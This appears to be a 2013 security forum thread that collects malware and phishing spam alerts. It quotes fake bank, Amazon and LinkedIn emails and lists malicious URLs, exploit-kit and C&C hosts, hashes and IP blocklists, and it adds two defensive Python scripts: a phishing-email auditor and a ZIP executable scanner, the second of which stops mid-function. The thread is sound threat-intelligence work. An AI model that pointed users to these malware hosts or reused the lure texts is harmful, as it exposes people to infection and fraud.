Download Software Patches and Updates
Access Knowledge Solutions / Frequently Asked Questions
Watch Animated Tours with Guided Input Instructions
Thank You,
ADP Client Services
support.ADP .com
Malicious URLs
technotkan .kz/templates/ja_purity_ii/adp_dpack.html
sub.mumbailocaltraintimetable .net/ensure/indeed-called_risk_omits.php
sub.mumbailocaltraintimetable .net/ensure/indeed-called_risk_omits.php?hyobrlhz=kniez&vvhxv=nle
sub.mumbailocaltraintimetable .net/ensure/indeed-called_risk_omits.php?df=1g:1i:2v:32:1f&ne=1g:2w:2w:1h:1g:1j:1l:1h:2v:30&h=1f&ug=q&tr=s&jopa=3366088
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/212eabee867edfdd16b53ce71693226a/tumblr_inline_mm8lqafPsL1qz4rgp.png
___
Something evil on 173.255.200.91
- http://blog.dynamoo.com/2013/05/something-evil-on-17325520091.html
3 May 2013 - "173.255.200.91 (Linode, US) is exhibiting the characteristics of the Neutrino Exploit kit* (see URLquery** and VirusTotal reports***). Attempts to analyse the malware seem to be generating 404 errors, but this could simply be a defensive mechanism by the malware on the server. I can see... domains on the server, ones flagged by Google for malware... I would recommend blocking all domains on this server... or simply block the IP address..."
* http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
** http://urlquery.net/search.php?q=173.255.200.91&type=string&start=2013-04-18&end=2013-05-03&max=50
*** https://www.virustotal.com/en/ip-address/173.255.200.91/information/
___
Malicious US Airways Spam
- http://threattrack.tumblr.com/post/49457796251/malicious-us-airways-spam
2 May 2013 - "Subjects Seen:
US Airways online check-in.
Typical e-mail details:
You can check in from 24 hours and up to 60 minutes before your flight (2 hours if you’re flying internationally). After that, all you need to do is print your boarding pass and go to the gate.
Malicious URLs
concaribe .com/images/wp_pageid.html?id=516047FC45UOYFC8AVC60VIQ
yob.newwaysys .com/ensure/origin-want_require.php?jnlp=e3ca9e7968
yob.newwaysys .com/ensure/origin-want_require.php?bnddxr=nlbaicu&zvgibtad=tqu
yob.newwaysys .com/ensure/origin-want_require.php?qf=1i:1f:32:33:2v&ge=32:1i:30:2v:1o:32:1m:1o:1l:1n&i=1f&wl=j&rw=r&jopa=2959383
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/233967e8d27c43917399012d925b29e7/tumblr_inline_mm6uluilQn1qz4rgp.png
___
Malicious Citibank Paymentech Attachment Spam
- http://threattrack.tumblr.com/post/49449018003/malicious-citibank-paymentech-attachment-spam
2 May 2013 - "Subjects Seen:
Merchant Statement
Typical e-mail details:
" Attached is your Citibank Paymentech electronic Merchant Billing Statement. If you need help, please contact your Account Executive or call Merchant Services at the telephone number listed on your statement. PLEASE DO NOT RESPOND BY USING REPLY. This email is sent from an unmonitored email address, and your response will not be received by Citibank Paymentech. Citibank Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Citibank Paymentech’s or the Merchant’s email service or otherwise. Citibank Paymentech recommends that Merchants continue to monitor their statement information regularly. ————— Learn more about Citibank Paymentech Solutions, LLC payment processing services at citibank.com. ————— THIS MESSAGE IS CONFIDENTIAL. This e-mail message and any attachments are proprietary and confidential information intended only for the use of the recipient(s) named above. If you are not the intended recipient, you may not print, distribute, or copy this message or any attachments. If you have received this communication in error, please notify the sender by return e-mail and delete this message and any attachments from your computer.
Malicious URLs
Spam contains a malicious attachment.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/47ea01968b479374fc6a4331248614b0/tumblr_inline_mm6o3sSQsp1qz4rgp.png
___
Fake LinkedIn SPAM / guessworkcontentprotect .biz
- http://blog.dynamoo.com/2013/05/linkedin-spam-guessworkcontentprotectbiz.html
2 May 2013 - "This fake LinkedIn email leads to malware on guessworkcontentprotect .biz:
From: LinkedIn Invitations [giuseppeah5 @mail.paypal .com]
Date: 2 May 2013 16:49
Subject: LinkedIn inviation notificaltion.
LinkedIn
This is a note that on May 2, Lewis Padilla sent you an invitation to join their professional network at LinkedIn.
Accept Lewis Padilla Invitation
On May 2, Lewis Padilla wrote:
> To: [redacted]
> I'd like to join you to my professional network on LinkedIn.
> Lewis Padilla
You are receiving Reminder emails for pending invitations. Unsubscribe.
© 2013 LinkedIn Corporation. 2029 Stierlin Ct, Mountain View, CA 94043, USA.
The malicious payload is at [donotclick]guessworkcontentprotect .biz/news/pattern-brother.php (report here*) hosted on:
82.236.38.147 (PROXAD Free SAS, France)
83.212.110.172 (Greek Research and Technology Network, Greece)
130.239.163.24 (Umea University, Sweden)
203.190.36.201 (Kementerian Pertanian, Indonesia)
Blocklist:
82.236.38.147
83.212.110.172
130.239.163.24
203.190.36.201 ..."
* http://urlquery.net/report.php?id=2293535
:mad::fear:
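Two of the tells the posts above rely on can be checked mechanically: dynamoo notes that "the link displayed in the email is fake and actually goes to a legitimate (but hacked) site", the fake LinkedIn invitation arrives from an address at mail.paypal .com, and Trend Micro's advice on the Apple ID phish is that "legitimate messages should generally have matching domains all around". The script below is an added example, not code from Trend Micro, dynamoo or this thread's author. It parses a message, compares the brand named in the From display name against the sender's domain, the Reply-To against the sender, each link's target against the sender, and any URL shown as link text against the real href. The two messages are constructed, modelled on the fake LinkedIn and PayPal mails quoted above; the brand table, hacked-site.example, the legitimate sender address and the two-label "registered domain" shortcut are assumptions made for the example.

```python
"""Check a message for the domain mismatches the posts above describe: a
display name claiming one brand while the address is at another domain,
link targets off the sender's domain, and visible link text that names one
site while the href goes elsewhere.

Added example; not code from Trend Micro, dynamoo or the thread's author.
The two messages below are constructed, modelled on the fake LinkedIn and
PayPal mails quoted in this thread."""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Brand word in the display name -> domains that brand legitimately mails from.
# Assumed for the example; a real deployment keeps a fuller table.
BRANDS = {"LinkedIn": {"linkedin.com"}, "PayPal": {"paypal.com"}}

URL_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})", re.I)


def registered_domain(host):
    """Last two labels of a hostname. An approximation (assumption): real
    code should consult the public-suffix list so co.uk-style names work."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def mail_domain(addr):
    return registered_domain(addr.rpartition("@")[2]) if "@" in addr else ""


def audit_message(raw, brands=BRANDS):
    """Return a list of findings for an RFC 5322 message; an empty list means
    sender, Reply-To, link targets and link texts all agree."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    name, addr = parseaddr(msg.get("From", ""))
    sender = mail_domain(addr)
    for brand, legit in brands.items():
        if brand.lower() in name.lower() and sender not in legit:
            findings.append(f"display name claims {brand} but sender domain is {sender}")
    reply = mail_domain(parseaddr(msg.get("Reply-To", ""))[1])
    if reply and reply != sender:
        findings.append(f"Reply-To domain {reply} differs from sender {sender}")
    body = msg.get_body(preferencelist=("html", "plain"))
    collector = LinkCollector()
    collector.feed(body.get_content() if body else "")
    for href, text in collector.links:
        target = registered_domain(urlsplit(href).hostname or "")
        if target and target != sender:
            findings.append(f"link to {target} in a message from {sender}")
        shown = URL_IN_TEXT.search(text)
        if shown and registered_domain(shown.group(1)) != target:
            findings.append(f"link text shows {registered_domain(shown.group(1))} "
                            f"but href goes to {target}")
    return findings


# Constructed, modelled on the fake LinkedIn mail above: sender at
# mail.paypal.com, a link via a (hypothetical) hacked site, and a link whose
# text says linkedin.com but whose href is the payload domain from the post.
PHISH = """\
From: LinkedIn Invitations <giuseppeah5@mail.paypal.com>
To: victim@example.net
Subject: LinkedIn inviation notificaltion.
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Lewis Padilla sent you an invitation to join their professional network.</p>
<p><a href="http://hacked-site.example/redirect">Accept Lewis Padilla Invitation</a></p>
<p><a href="http://guessworkcontentprotect.biz/news/pattern-brother.php">https://www.linkedin.com/e/inv</a></p>
</body></html>
"""

# Constructed counterpart where everything agrees (sender address assumed).
LEGIT = """\
From: LinkedIn <invitations@linkedin.com>
To: victim@example.net
Subject: Invitation
Content-Type: text/html; charset="utf-8"

<html><body><a href="https://www.linkedin.com/e/inv">https://www.linkedin.com/e/inv</a></body></html>
"""

if __name__ == "__main__":
    for finding in audit_message(PHISH):
        print("PHISH:", finding)
    print("LEGIT:", audit_message(LEGIT) or "no findings")
```

The brand check is what catches the LinkedIn-from-PayPal sender even before any link is followed; the link-text check is the one that would have flagged the PayPal "Reset your password now" mails above, where the visible link looks right and only the href gives the hacked intermediate site away.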
AplusWebMaster
2013-05-06, 20:26
FYI...
Mother’s Day SPAM ...
- http://www.symantec.com/connect/blogs/spammers-continue-exploit-mother-s-day
6 May 2013 - "... Spam messages related to Mother’s Day have begun flowing into the Symantec Probe Network. Clicking the URL contained in the spam message automatically -redirects- the recipient to a website containing a bogus Mother’s Day offer upon completion of a -fake- survey.
> https://www.symantec.com/connect/sites/default/files/users/user-1013481/mothers%201.png
Once the survey is completed, a page is then displayed asking the user to enter their personal information in order to receive the -bogus- offer.
> https://www.symantec.com/connect/sites/default/files/users/user-1013481/mothers%202.png
Next...
> https://www.symantec.com/connect/sites/default/files/users/user-1013481/mothers%203.png
... Symantec is observing an increase in spam volume related to Mother’s Day, which can be seen in the following graph.
> https://www.symantec.com/connect/sites/default/files/users/user-1013481/mothers%205.png
... use caution when receiving unsolicited or unexpected emails. We are closely monitoring Mother’s Day spam attacks to ensure that readers are kept up to date with information on the latest threats..."
- https://www.bbb.org/blog/2013/05/avoiding-mothers-day-email-scams/
May 6, 2013
- http://mashable.com/2013/05/01/mothers-day-email-scams/
2013-05-01
:fear::mad:
AplusWebMaster
2013-05-07, 12:20
FYI...
AutoIt malware - 188.161.9.226 ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/autoit-used-to-spread-malware-and-toolsets/
May 6, 2013 - "... In addition to tools being found on sites like Pastebin and Pastie, we are also seeing a tremendous increase in the amount of malware utilizing AutoIt as a scripting language. One piece of malware that was found in the wild was particularly interesting. This malware is a variant of the popular DarkComet RAT – utilizing AutoIt. This variant runs a backdoor on the victim machine and communicates outbound to a nefarious host at shark18952012.no-ip .info (188.161.9.226 at the time of writing) over port 1604... In addition to this malware’s outbound communication, it also modifies the local software firewall policies to disable them, in addition to installing itself at startup for persistence... Upon execution of the malware, it immediately disables the Windows Firewall. After disabling the firewall, the malware then disables the ability to get into the registry of Windows to view or undo the changes performed... As scripting languages like AutoIt continue to gain popularity, we expect more of these types of malware to make a migration to using them. The ease of use and learning, as well as the ability to post code easily to popular dropsites make this a great opportunity for actors with nefarious intentions to propagate their tools and malware. We recommend continuing to update your Anti-Virus signatures as well as consider blocking access to Pastebin, Pastie and other code dropsites on your corporate network where applicable."
___
Something evil on 151.248.123.170 Part III
- http://blog.dynamoo.com/2013/05/something-evil-on-151248123170-part-iii.html
7 May 2013 - "I've covered 151.248.123.170 (Reg.ru, Russia*) a couple of times in the past month [1] [2], and it's still actively pushing out malware via dynamic DNS domains, many of which are injection attacks on hacked sites. There are hundreds or possibly thousands of malicious domains on this IP. Blocking them individually is likely to be problematic, the best approach is to block all traffic to 151.248.123.170 or to the Dynamic DNS domains involved.. although this might potentially block access to some legitimate sites..."
1) http://blog.dynamoo.com/2013/04/something-evil-on-151248123170_24.html
2) http://blog.dynamoo.com/2013/04/something-evil-on-151248123170.html
* https://www.google.com/safebrowsing/diagnostic?site=AS:39134
___
Fake Citibank ‘Merchant Billing Statement’ emails lead to malware
- http://blog.webroot.com/2013/05/07/citibank-merchant-billing-statement-themed-emails-lead-to-malware/
May 7, 2013 - "Over the past 24 hours, we’ve intercepted yet another spam campaign impersonating Citibank in an attempt to socially engineer Citibank customers into thinking that they’ve received a Merchant Billing Statement. Once users execute the malicious attachment found in the fake emails, their PCs automatically join the botnet operated by the cybercriminal/cybercriminals...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/05/citibank_merchant_billing_statement_malware_malicious_software_social_engineering_botnet_botnets_trojan.png
Detection rate for the malicious executable: MD5: 75a666f81847ccf7656790162e6a666a * ... Trojan-Spy.Win32.Zbot.lcnn..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/52dc5d89ed540061e4779b5c21c2c6be288aba9373271434157489c7addcdb03/analysis/1367618876/
File name: Kwmfd2.exe
Detection ratio: 33/46
Analysis date: 2013-05-05
AplusWebMaster
2013-05-08, 12:25
FYI...
Fake Amazon.com SPAM / ehrap .net
- http://blog.dynamoo.com/2013/05/amazoncom-spam-ehrapnet.html
8 May 2013 - "This fake Amazon spam leads to malware on ehrap .net:
Date: Tue, 7 May 2013 22:54:26 +0100 [05/07/13 17:54:26 EDT]
From: "Amazon.com" [drudgingb50@m.amazonmail.com]
Subject: Your Amazon.com order confirmation.
Thanks for your order, [redacted]!
Did you know you can view and edit your orders online, 24 hours a day? Visit Your Account.
Order Information:
E-mail Address: [redacted]
Billing Address:
216 CROSSING CRK N
GAHANNA
United States
Phone: 1-747-289-5672
Order Grand Total: $ 53.99
Earn 3% rewards on your Amazon.com orders with the Amazon Visa Card. Learn More
Order Summary:
Details:
Order #: I12-4392835-6098844
Subtotal of items: $ 53.99
Total before tax: $ 53.99
Tax Collected: $0.00
Grand Total: $ 50.00
Gift Certificates: $ 3.99
Total for this Order: $ 53.99
The following item is auto-delivered to your Kindle or other device. You can view more information about this order by clicking on the title on the Manage Your Kindle page at Amazon.com.
Mockingjay (The Final Book of The Hunger Games) [Kindle Edition] $ 53.99
Sold By: Random House Digital, Inc.
Give Kindle books to anyone with an e-mail address - no Kindle required!
You can review your orders in Your Account. If you've explored the links on that page but still have a question, please visit our online Help Department.
Please note: This e-mail was sent from a notification-only address that cannot accept incoming e-mail. Please do not reply to this message.
Thanks again for shopping with us.
Amazon.com
Earth's Biggest Selection
Prefer not to receive HTML mail? Click here
The link in the email goes through a legitimate hacked site and ends up on [donotclick]ehrap .net/news/days_electric-sources.php (report here*) hosted on (or with nameservers on) the following IPs:
85.41.88.24 (Telecom Italia, Italy)
98.210.212.79 (Comcast, US)
140.121.140.92 (TANet, Taiwan)
178.175.140.185 (Trabia-Network, Moldova)
197.246.3.196 (The Noor Group, Egypt)
216.70.110.21 (Media Temple, US)
The domains involved indicate that this is the gang behind what I call the Amerika series of spam emails.
Blocklist:
85.41.88.24
98.210.212.79
140.121.140.92
178.175.140.185
197.246.3.196
216.70.110.21 ..."
* http://urlquery.net/report.php?id=2377955
___
Fake AV and ransomware combo
- https://www.net-security.org/malware_news.php?id=2486
8 May 2013 - "Ransomware and fake antivirus solutions are well-known threats, but a deadly fraudulent combination of the two has been recently spotted... The software - dubbed "Secure Bit" - first tries to convince the victims that the "security level" of their computer is low and instructs them to call for support so that the “threats” it has "found" can be removed. The claim is accompanied by a pop-up that lists a great number of them. But if the victims don't do as they are told after a period of time, the fake AV turns nasty (well, nastier), and locks the computer screen. The victims can't do anything on their machine, and they are again told to contact the given phone number in order to regain control of it. The phone call reveals that it will cost the victims $49.99 to do that, and Total Defense's Tsahi Carmona warns* that many users may not recognize it's a scam and may pay the ransom..."
* http://www.totaldefense.com/blogs/2013/05/07/newfake-anti-virus-secure-bit.aspx
"... This anti-virus software pretender combines two methods of fraud – the fake anti-virus software and a malware that supposedly locks the screen in order to make the victim pay money to unlock. After the user installs this free “anti-virus” software it immediately notifies that the security level of the computer is low and that they need to call for support to address the found “threats”..."
___
Fake Amazon emails lead to malware...
- http://blog.webroot.com/2013/05/08/fake-amazon-your-kindle-e-book-order-themed-emails-circulating-in-the-wild-lead-to-client-side-exploits-and-malware/
May 8, 2013 - "... Cybercriminals are currently mass mailing tens of thousands of fake Amazon “You Kindle E-Book Order” themed emails in an attempt to trick Kindle users into clicking on the malicious links found in these messages. Once they do so, they’ll be automatically exposed to the client-side exploits served by the Black Hole Exploit Kit, ultimately joining the botnet operated by the cybercriminal/cybercriminals that launched the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/05/amazon_kindle_ebook_order_fake_email_malware_malicious_software_spam_spamvertised_social_engineering.png?w=650&h=486
... MD5 for the Java exploit: MD5: c9bc87eef8db72f64bac0a72f82b04cf * ... HEUR:Exploit.Java.CVE-2012-0507.gen
MD5 for the PDF exploit: MD5: 53c90140fde593713efe6298547ff205 ** ...Exploit:Win32/CVE-2010-0188
Upon successful client-side exploitation, the campaign drops MD5: 330ad00466bd44a5fb2786f0f5e2d0da *** ...Trojan.Win32.Reveton.a (v).
... phones back to: [list of callback IPs omitted; see the webroot URL above] ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/68b33b489044b0ebfe9b856219cd5c097050cfb48b610dcefeb06876647043b0/analysis/1367968246/
File name: days_electric-sources.php
Detection ratio: 5/46
Analysis date: 2013-05-07
** https://www.virustotal.com/en/file/ff12998983a0a3a753aa808b3d635ddafaf555fb18e4b7fcc35b9087cc6b534f/analysis/1367968346/
File name: Kindle.pdf
Detection ratio: 26/46
Analysis date: 2013-05-07
*** https://www.virustotal.com/en/file/150872022d30ede70f0d959b671281d44b55883a229e07dd0bdcf33a0a827274/analysis/
File name: sndrec32.exe
Detection ratio: 16/46
Analysis date: 2013-05-08
___
Malicious Better Business Bureau Spam
- http://threattrack.tumblr.com/post/49947201132/malicious-better-business-bureau-spam
8 May 2013 - "Subjects Seen:
Better Business Beareau Complaint ID [removed]
Typical e-mail details:
The Better Business Bureau has been entered the above mentioned complaint from one of your users in regard to their business contacts with you. The information about the consumer’s concern are available at the link below. Please give attention to this point and notify us about your belief as soon as possible.
We kindly ask you to open the RECLAMATION REPORT to answer on this claim.
We are looking forward to your prompt response.
WBR
Colton Reed
Dispute Advisor
Better Business Bureau
Malicious URLs
stopwulgaryzmom .pl/bbb_view_compl.html?complain=DFMI30GA2_80VJA8
pub.mumbailocaltraintimetable .net/ensure/misuse-restrict-systems_properties.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7a1dafe59a95df30f857c5986a835646/tumblr_inline_mmht3xfiSm1qz4rgp.png
AplusWebMaster
2013-05-09, 16:19
FYI...
Fake Citibank SPAM / Statement ID 64775-4985.doc
- http://blog.dynamoo.com/2013/05/citibank-spam-statement-id-64775-4985doc.html
9 May 2013 - "This fake Citibank spam contains a malicious Word document that leads to malware.
Date: Thu, 9 May 2013 01:22:21 +0200 [05/08/13 19:22:21 EDT]
From: CITIBANK [noreply @citybank .com]
Subject: Merchant Statement
Enclosed DOC is your Citibank Paymentech electronic Merchant Billing Statement. If you need help, please contact your Account Executive or call Merchant Services at the telephone number listed on your statement. PLEASE DO NOT RESPOND BY USING REPLY. This email is sent from an unmonitored email address, and your response will not be received by Citibank Paymentech. Citibank Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Citibank Paymentech's or the Merchant's email service or otherwise. Citibank Paymentech recommends that Merchants continue to monitor their statement information regularly. ---------- Learn more about Citibank Paymentech Solutions, LLC payment processing services at Citibank. ---------- THIS MESSAGE IS CONFIDENTIAL. This e-mail message and any attachments are proprietary and confidential information intended only for the use of the recipient(s) named above. If you are not the intended recipient, you may not print, distribute, or copy this message or any attachments. If you have received this communication in error, please notify the sender by return e-mail and delete this message and any attachments from your computer.
The attached document Statement ID 64775-4985.doc contains an exploit (analysis pending) with a VirusTotal detection rate of just 10/46*. It appears to exploit a flaw in the RTF converter... making sure that your copy of Microsoft Office is up-to-date and fully patched will help to mitigate against this sort of threat."
* https://www.virustotal.com/en/file/2cf2fbe92004b98b8dd5ff4631787dcf8241723020f1216b89a1a706addf9347/analysis/
File name: Statement ID 64775-4985.doc
Detection ratio: 10/46
Analysis date: 2013-05-09
Update: another version is using the filename Statement ID 4657-345-347-0332.doc. It looks like it is exploiting CVE-2012-0158* aka MS12-027.
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH)
Last revised: 03/07/2013
___
Fake Traffic Ticket serves malware
- http://blog.webroot.com/2013/05/09/cybercriminals-impersonate-new-york-states-department-of-motor-vehicles-dmv-serve-malware/
9 May 2013 - "Cybercriminals are currently spamvertising tens of thousands of -bogus- emails impersonating New York State’s Department of Motor Vehicles (DMV) in an attempt to trick users into thinking they’ve received a uniform traffic ticket, that they should open, print and send to their town’s court. In reality, once users open and execute the malicious attachment, their PCs will automatically join the botnet operated by the cybercriminal/cybercriminals behind the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/05/new_york_state_dmv_uniform_traffic_ticket_fake_email_spam_malware_malicious_software_social_engineering.png?w=423&h=290
Detection rate for the malicious executable: MD5: 247c67cb99922fd4d0e2ca5d6976fc29 * ... Trojan-Spy.Win32.Zbot.lhim..."
(More detail available at the webroot URL above.)
* https://www.virustotal.com/en/file/dae8aa7d95823779ae29f74571f42bf70bbb1e3a294842470c9f75f757ca43b1/analysis/
File name: Unihl.exe
Detection ratio: 30/45
Analysis date: 2013-05-08
AplusWebMaster
2013-05-10, 15:06
FYI...
Malicious Facebook Friend Notification Spam
- http://threattrack.tumblr.com/post/50026329673/malicious-facebook-friend-notification-spam
9 May 2013 - "Subjects Seen:
[removed] wants to be friends on Facebook
Typical e-mail details:
[removed] wants to be friends with you on Facebook Facebook.
Malicious URLs
web.jen-pages .de/fbreq.html
job.bgita .ru/fbreq.html
yup.mumbailocaltraintimetable .net/ensure/specified_drop_similarly.php?jnlp=7ad5b52a64
yup.mumbailocaltraintimetable .net/ensure/specified_drop_similarly.php?zvvsj=edwwqnl&wit=tjm
yup.mumbailocaltraintimetable .net/ensure/specified_drop_similarly.php?mf=1i:1f:32:33:2v&le=1m:2v:31:1k:2w:1k:1h:2v:1l:1j&u=1f&yj=i&cp=j&jopa=5216591
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/36bb654b369128a847231d5b86b7c58e/tumblr_inline_mmjo2ooht71qz4rgp.png
___
Something evil on 151.248.123.170, Part IV
- http://blog.dynamoo.com/2013/05/something-evil-on-151248123170-part-iv.html
10 May 2013 - "Here are some additional malicious domains from a very evil malware server on 151.248.123.170 (Reg.ru, Russia)... you can download a full list of everything that I can find here** [.txt]. This server is currently being used as the payload for injection attacks. Blocking the IP address is the obvious solution, or you could block the Dynamic DNS domains listed here*..."
* http://blog.dynamoo.com/2013/05/something-evil-on-151248123170-part-iii.html
** http://www.dynamoo.com/files/151-248-123-170.txt
___
USAA Credentials Phish
- http://threattrack.tumblr.com/post/50108697070/usaa-credentials-phish
10 May 2013 - "Subjects Seen:
Important Message From Usaa
Typical e-mail details:
Dear Valued Customer,
We have created new dedicated security servers to keep all our
online banking customers account safe and secure. This is server
has been tested,now we are asking all our online banking customers
to register for the new security server to keep them safe.
To register for this new security server quickly click on the button
below to complete registration immediately.
Click Here To Register
We hope you find our Internet Banking service easy and convenient to use.
Yours sincerely
USAA,
Digital Banking Director
Malicious URLs
sehyup .com/08_dev/board/file/bbs_notice/vi.htm
philanthropyexpert .org/ass/index.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f7ea6a1ae0534f4394386635bb0eb294/tumblr_inline_mmln1qLK0n1qz4rgp.png
AplusWebMaster
2013-05-13, 13:50
FYI...
Something evil on 188.241.86.33
- http://blog.dynamoo.com/2013/05/something-evil-on-1882418633.html
13 May 2013 - "188.241.86.33 (Megahost, Romania) is a malware server currently involved in injection attacks, serving up the Blackhole exploit kit, Zbot and a side order of Cdorked [1] [2]. This IP hosts a variety of domains, some of which are purely malicious, some of which are hijacked subdomains of legitimate ones. Blocking the IP address is the easiest approach..."
(More detail at the dynamoo URL above.)
1) http://urlquery.net/search.php?q=188.241.86.33&type=string&start=2013-04-28&end=2013-05-13&max=50
2) https://www.virustotal.com/en/ip-address/188.241.86.33/information/
___
Browser extension hijacks Facebook profiles
- https://blogs.technet.com/b/mmpc/archive/2013/05/10/browser-extension-hijacks-facebook-profiles.aspx?Redirected=true
10 May 2013 - "We have received reports about a wave of malicious browser extensions trying to hijack Facebook profiles. This threat was first discovered in Brazil. We detect it as Trojan:JS/Febipos.A. The malware is a malicious browser extension specifically targeting Chrome and Mozilla Firefox..."
- http://h-online.com/-1861398
13 May 2013 - "... The trojan extensions themselves monitor users' browser activity to see if they are logged into Facebook and then retrieve a configuration file from a site, disguised as a .php file, which contains commands for the extension. The extension is able to like pages, share pages, post, join groups, invite friends to groups, chat to friends or comment on posts... Microsoft recommends that users review their installed extensions..."
___
Fake BoA Paymentech Malicious Word Doc Attachment Spam
- http://threattrack.tumblr.com/post/50349361323/bank-of-america-paymentech-malicious-word-doc
13 May 2013 - "Subjects Seen:
BOA Merchant Statement
Typical e-mail details:
Attached (DOC|WORD file|document|file) is your Bank of America Paymentech electronic Merchant Billing Statement.
If you need assistance, please (contact|message|call) your Account Executive or call Merchant Services at the telephone number listed on your statement.
PLEASE DO NOT RESPOND BY USING REPLY. This (email|mail) is sent from an unmonitored email address, and your response will not be received by Bank of America Paymentech.
Bank of America Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Bank of America Paymentech’s or the Merchant’s email service or otherwise. Bank of America Paymentech recommends that Merchants continue to monitor their statement information regularly.
Spam contains malicious attachment.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e97f4b74fb8abec483dfd265ee12678f/tumblr_inline_mmqx7bdxu51qz4rgp.png
___
Malicious Citibank Secure Message Spam
- http://threattrack.tumblr.com/post/50357500910/malicious-citibank-secure-message-spam
13 May 2013 - "Subjects Seen:
You have received a secure message
Typical e-mail details:
Read your secure message by opening the attachment, securedoc.html You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it with Internet Explorer.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Citi Secure Email Help Desk at (866) 535-2504.
First time users - will need to register after opening the attachment.
About Email Encryption - citi .com/citi/citizen/privacy/email.htm
Malicious URLs
mail.yaklasim .com:8080/forum/viewtopic.php
116.122.158.195 :8080/forum/viewtopic.php
vulcantire .net/forum/viewtopic.php
westautorepair .com/forum/viewtopic.php
metroimport-tires .com/forum/viewtopic.php
iis1.ontera .net/AUWY5Z.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a56d101a2242f408aec441042ef617f2/tumblr_inline_mmr3owXmUI1qz4rgp.png
___
Fake AMEX SPAM / SecureMail.zip
- http://blog.dynamoo.com/2013/05/confidential-secure-message-from-amex.html
13 May 2013 - "This fake Amex email has a malicious attachment:
Date: Tue, 14 May 2013 01:34:36 +0600 [15:34:36 EDT]
From: American Express [Jarvis_Randall @aexp .com]
Subject: Confidential - Secure Message from AMEX
Secure Message
The security of your personal information is of the utmost importance to American Express, so we have sent the attached as a secure electronic file.
Note: The attached file contains encrypted data.
If you have any questions, please call us at 800-748-8515, option 0. Representatives are available to assist you Monday through Thursday between 8:00 a.m. and 8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET.
The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited.
Thank you,
American Express
2012 American Express Company. All rights reserved.
There is an attachment SecureMail.zip which in turn contains an executable file SecureMail .exe which has an icon designed to look like a PDF file. VirusTotal results for the malware are just 15/46*. Comodo CAMAS reports the following characteristics and also a connection to a known malware C&C server mail.yaklasim .com on 212.58.4.13 (DorukNet, Turkey).
Size 137216
MD5 20de8bad8bf8279e4084e9db461bd140
SHA1 caacc00d68f41dad9b1abb02f9e243911f897852
SHA256 18e2fc0b9386cadc31fb15cb38d9fa5d274f42b8127b349a14c962329b691ee7
The ThreatTrack report*** also shows a connection to 212.58.4.13 as well as 62.233.104.156 (IOMART, UK) and several other IPs that may form part of a botnet. Blocking EXE-in-ZIP files at the perimeter is a good move if you can do it.
Blocklist:
mail.yaklasim .com
212.58.4.13
62.233.104.156 ..."
* https://www.virustotal.com/en/file/18e2fc0b9386cadc31fb15cb38d9fa5d274f42b8127b349a14c962329b691ee7/analysis/1368476716/
File name: SecureMail.exe
Detection ratio: 15/46
Analysis date: 2013-05-13
** http://camas.comodo.com/cgi-bin/submit?file=18e2fc0b9386cadc31fb15cb38d9fa5d274f42b8127b349a14c962329b691ee7
*** http://www.dynamoo.com/files/analysis_30572_20de8bad8bf8279e4084e9db461bd140.pdf
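One way to act on the "block EXE-in-ZIP files at the perimeter" advice above, as an added example (not dynamoo's or Comodo's code): inspect every ZIP entry both for an executable extension and for the MZ header, so a renamed executable with a PDF-style icon like SecureMail.exe is still caught. The archive and its contents are constructed in memory; no real sample is used.

```python
import io
import zipfile

# Extensions Windows runs directly on double-click.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}


def is_pe_payload(head: bytes) -> bool:
    """True if the bytes start with the 'MZ' DOS header shared by EXE/DLL/SCR files."""
    return head[:2] == b"MZ"


def inspect_zip(blob: bytes, max_entry_bytes: int = 50 * 1024 * 1024) -> list:
    """Return one finding per suspicious entry: {'name': ..., 'reasons': [...]}.

    Only the first two bytes of each entry are read, and entries whose declared
    size exceeds max_entry_bytes are not opened at all (decompression-bomb guard).
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
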